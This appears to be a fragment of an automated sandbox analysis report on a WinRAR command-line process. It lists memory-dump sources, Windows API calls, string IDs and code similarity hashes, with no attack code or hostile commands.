• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: CloseFileModuleNameOpenQueryValue
• String ID: AppData$Software\WinRAR\Paths
• API String ID: 3617018055-3415417297
• Opcode ID: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
• Instruction ID: 278287ca41216382a6f81c7c12397304d46ccb6544a092ca0734d3944b13f95f
• Opcode Fuzzy Hash: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
• Instruction Fuzzy Hash: F7119023A28B4281EF109F21F4006AA7761FF98BC8F451131FA4E43A59EFBED455CB09
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
Strings
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID:
• String ID: H9
• API String ID: 0-2207570329
• Opcode ID: dc8ac98f76198ceb84fbff606d01c81e4b442a240a692ad2837d24375af1e692
• Instruction ID: 5b76a29bb9a429fbf95436c76ca86b59604af01d988dbf8752473e8a34968632
• Opcode Fuzzy Hash: dc8ac98f76198ceb84fbff606d01c81e4b442a240a692ad2837d24375af1e692
• Instruction Fuzzy Hash: 27E1F363A08A9285EF50DB24E048BFE27E5EB6574CF464431EE4D83385DF7AD564C30A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
APIs
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: ErrorFileLastWrite$Handle
• String ID:
• API String ID: 3350704910-0
• Opcode ID: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
• Instruction ID: 1a924b5a7fdac0216dc589ee0988674edececba282bef150a24f0347f0430a89
• Opcode Fuzzy Hash: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
• Instruction Fuzzy Hash: AD51C323A0868183EF24DF65E41437A63A0FB64B40F450135EB4E87BA4DFBEE455C60A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$CreateErrorLast$Time
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1999340476-0
                                                                                                                                                                      • Opcode ID: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                                                                                                                                      • Instruction ID: cc05663bab7e968e08190eee9f9e928b98d66bba2e9b7dfed25dac2f644fb595
                                                                                                                                                                      • Opcode Fuzzy Hash: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                                                                                                                                      • Instruction Fuzzy Hash: 4D414673A1968106FF608B24E4057AA6691A764BB8F110734EE7D836C8DFBEC459CB05
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: swprintf
                                                                                                                                                                      • String ID: rar.ini$switches=$switches_%ls=
                                                                                                                                                                      • API String ID: 233258989-2235180025
                                                                                                                                                                      • Opcode ID: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                                                                                                                                      • Instruction ID: 50dc6a9bbe93f0d9a9cbc102029c390884d004d24e28f0f968516ff37904f386
                                                                                                                                                                      • Opcode Fuzzy Hash: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                                                                                                                                      • Instruction Fuzzy Hash: 9D41D523A1C64241EF14DB60E4102F923A0FF65794F420536FA9D836D9EFBED566C309
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: AddressHandleModuleProcsetbuf$ErrorLibraryLoadModeVersion
• String ID: rar.lng
• API String ID: 553376247-2410228151
• Opcode ID: aae33f096e44b7179777c7a4e7d7280ac8be15058bdc46fbde8d3aab13c1519a
• Instruction ID: 2d6d45bd32b3814d69d135b289b8064ff9a1be1c073d5a51e13957fc9da7b9a0
• Opcode Fuzzy Hash: aae33f096e44b7179777c7a4e7d7280ac8be15058bdc46fbde8d3aab13c1519a
• Instruction Fuzzy Hash: 5541AF23A1C68342EF10AB20E4017B923919F75794F460035F95E8B2D7DEAFA466C70A
Uniqueness
• Uniqueness Score: -1.00%
Control-flow Graph
APIs
• SHGetMalloc.SHELL32(?,00000800,?,00007FF6EE764432,?,?,?,?,00000800,00000000,00000000,00007FF6EE7638CB,?,?,?,00007FF6EE7641EC), ref: 00007FF6EE7640C4
• SHGetSpecialFolderLocation.SHELL32(?,?,?,?,00000800,00000000,00000000,00007FF6EE7638CB,?,?,?,00007FF6EE7641EC), ref: 00007FF6EE7640DF
• SHGetPathFromIDListW.SHELL32 ref: 00007FF6EE7640F1
  • Part of subcall function 00007FF6EE753458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF6EE76413F,?,?,?,?,00000800,00000000,00000000,00007FF6EE7638CB,?,?,?,00007FF6EE7641EC), ref: 00007FF6EE7534A0
  • Part of subcall function 00007FF6EE753458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF6EE76413F,?,?,?,?,00000800,00000000,00000000,00007FF6EE7638CB,?,?,?,00007FF6EE7641EC), ref: 00007FF6EE7534D5
Strings
Similarity
• API ID: CreateDirectory$FolderFromListLocationMallocPathSpecial
• String ID: WinRAR
• API String ID: 977838571-3970807970
• Opcode ID: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
• Instruction ID: ddf412577455636cf5ab89a58f0508af55176e0aee4bf2c55b6f8afcea9d3f67
• Opcode Fuzzy Hash: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
• Instruction Fuzzy Hash: 6A218013A08B4240EF549F22E8402BA5360BFA9BD4F061031EF0E87359EE7ED465C605
Uniqueness
• Uniqueness Score: -1.00%
APIs
Similarity
• API ID: ErrorLast$FileHandleRead
• String ID:
• API String ID: 2244327787-0
• Opcode ID: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
• Instruction ID: c28c70115258fe0063e39958251d96c60a06b5380c9f175159cabc126695bd5c
• Opcode Fuzzy Hash: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
• Instruction Fuzzy Hash: 0021C923E08E5681EF604B21E40033963A2BF61B96F114535F95DC76C8CEAFD869C74B
Uniqueness
• Uniqueness Score: -1.00%
Strings
Similarity
• API ID:
• String ID: AFUM$default.sfx
• API String ID: 0-2491287583
• Opcode ID: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
• Instruction ID: 8db3729fc002ad16cdd6164b235cac3b3ee7842daebcfd9cde3d85edd15308f2
• Opcode Fuzzy Hash: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
• Instruction Fuzzy Hash: 4781A823A0C69240FF609B11D5003B92292AF71745F464032FA8D876C5EFAF94E6D71E
Uniqueness
• Uniqueness Score: -1.00%
APIs
Strings
Similarity
• API ID: FileHandleType
• String ID: @
• API String ID: 3000768030-2766056989
• Opcode ID: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
• Instruction ID: 735a6455fa25cab6461c4565f355508bde57c4efe5e33d97fc3f6ca264ea0ce4
• Opcode Fuzzy Hash: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
• Instruction Fuzzy Hash: 71210863A0C74240EF648B64F4902392651EF65730F271335E6AE873D8CE7BD4A1D30A
Uniqueness
• Uniqueness Score: -1.00%
APIs
Strings
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Threadwcschr$CreateExceptionPriorityThrow
                                                                                                                                                                      • String ID: CreateThread failed
                                                                                                                                                                      • API String ID: 1217111108-3849766595
                                                                                                                                                                      • Opcode ID: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                      • Instruction ID: 76d2dd972fbd17215d3734ddfafb87c7d6c74aa86692e99998c419cc9926f63e
                                                                                                                                                                      • Opcode Fuzzy Hash: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                      • Instruction Fuzzy Hash: 5C11E633A08A4182EF00EB10E8443B97361FFA4785F414032F69D87259EFBEE566C709
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: CriticalSection$EnterEventLeave
• String ID:
• API String ID: 3094578987-0
• Opcode ID: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
• Instruction ID: 49c18a7351887f78b2af0996d13230958d8e53e49d0d658d08e445b0beceace5
• Opcode Fuzzy Hash: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
• Instruction Fuzzy Hash: 3EF0D623608B4282DF209F21F5442B86762FF98B99F050130EE8D472ADDF6ED525CB05
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: ConsoleFileHandleModeType
• String ID:
• API String ID: 4141822043-0
• Opcode ID: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
• Instruction ID: d1afb25d53700e0b3d74b1a271afb26cdd842bc665dd9414817be7cfd0c1dd70
• Opcode Fuzzy Hash: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
• Instruction Fuzzy Hash: D8E0C226F0460343FF584725E86533802519F69B81F411038F80FCE354EEAED4A6C306
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
• Instruction ID: 6b72018191fd94e87d0cd5b57ffee079c68c64d29d90ffaae58c8999b34bc76d
• Opcode Fuzzy Hash: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
• Instruction Fuzzy Hash: 57E01221A0874582EF44AB60E84137523526F64741F025838EC0E823A6CEBFE82DC356
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: CharEnvironmentExpandStrings
• String ID:
• API String ID: 4052775200-0
• Opcode ID: fcc6bb39599084807c43192b89aab19ff5ae85cc802a468cbb490d5049967146
• Instruction ID: 3bcadf87c08e8c456ed9aca1f38098b88b44267830d5b071144b09da04dd5246
• Opcode Fuzzy Hash: fcc6bb39599084807c43192b89aab19ff5ae85cc802a468cbb490d5049967146
• Instruction Fuzzy Hash: BAE1E923A1868281EF708B24D4002BD67A1FB61794F454131FB9E876D9EFBED4A6C706
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF6EE747EBE,00000000,00000000,00000000,00000000,00000007,00007FF6EE747C48), ref: 00007FF6EE751B8D
• CreateFileW.KERNEL32(?,?,00000800,?,00000000,00007FF6EE747EBE,00000000,00000000,00000000,00000000,00000007,00007FF6EE747C48), ref: 00007FF6EE751BD7
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
• Instruction ID: bd729412673db7ee726e849c702a079c5e18e902225f3b593bac9fb452f482a2
• Opcode Fuzzy Hash: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
• Instruction Fuzzy Hash: C6314D63A18A8546FB709F10D4053693690FB61779F114334EDAC876C5EFBEC4A5C709
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: ExceptionThrowstd::bad_alloc::bad_alloc
• String ID:
• API String ID: 932687459-0
• Opcode ID: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
• Instruction ID: 3fa69aed82d5fa82d01ed9666f59c717562e314bfb3db32dacc59f0aed787517
• Opcode Fuzzy Hash: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
• Instruction Fuzzy Hash: 3D219353918E8582DB41CF29E1411B86360FBACB88B15A321EF4D42656EF69E5F5C301
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4f6026273c0a9246411fc6740a6753b01b0e10de163d24a49de1b808aba71c52
• Instruction ID: a462e5f141b21f10b8aa9ceeac9576eed0a37bc161bd39435a8d9637af55f04b
• Opcode Fuzzy Hash: 4f6026273c0a9246411fc6740a6753b01b0e10de163d24a49de1b808aba71c52
• Instruction Fuzzy Hash: F911B43250AB8281EF409B54E9003A973A4EF64794F250234F69D473E6DEBDD422C30A
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
• Opcode ID: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
• Instruction ID: a6247db48d1824a1a6f55e67ffa0895ba418555e62e11e119ea6da1e22a60160
• Opcode Fuzzy Hash: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
• Instruction Fuzzy Hash: CC010222A1D6C542EF644B66E40023E6262EF74BA0F265630FA2D83BD4CE6EE455C705
Uniqueness
Uniqueness Score: -1.00%

APIs
• setbuf.LIBCMT ref: 00007FF6EE747A7B
  • Part of subcall function 00007FF6EE792AE4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6EE797EF3
• setbuf.LIBCMT ref: 00007FF6EE747A8F
  • Part of subcall function 00007FF6EE747B44: GetStdHandle.KERNEL32(?,?,?,00007FF6EE747A9E), ref: 00007FF6EE747B4A
  • Part of subcall function 00007FF6EE747B44: GetFileType.KERNELBASE(?,?,?,00007FF6EE747A9E), ref: 00007FF6EE747B56
  • Part of subcall function 00007FF6EE747B44: GetConsoleMode.KERNEL32(?,?,?,00007FF6EE747A9E), ref: 00007FF6EE747B69
  • Part of subcall function 00007FF6EE792ABC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6EE792AD0
  • Part of subcall function 00007FF6EE792B40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6EE792C1C
Memory Dump Source
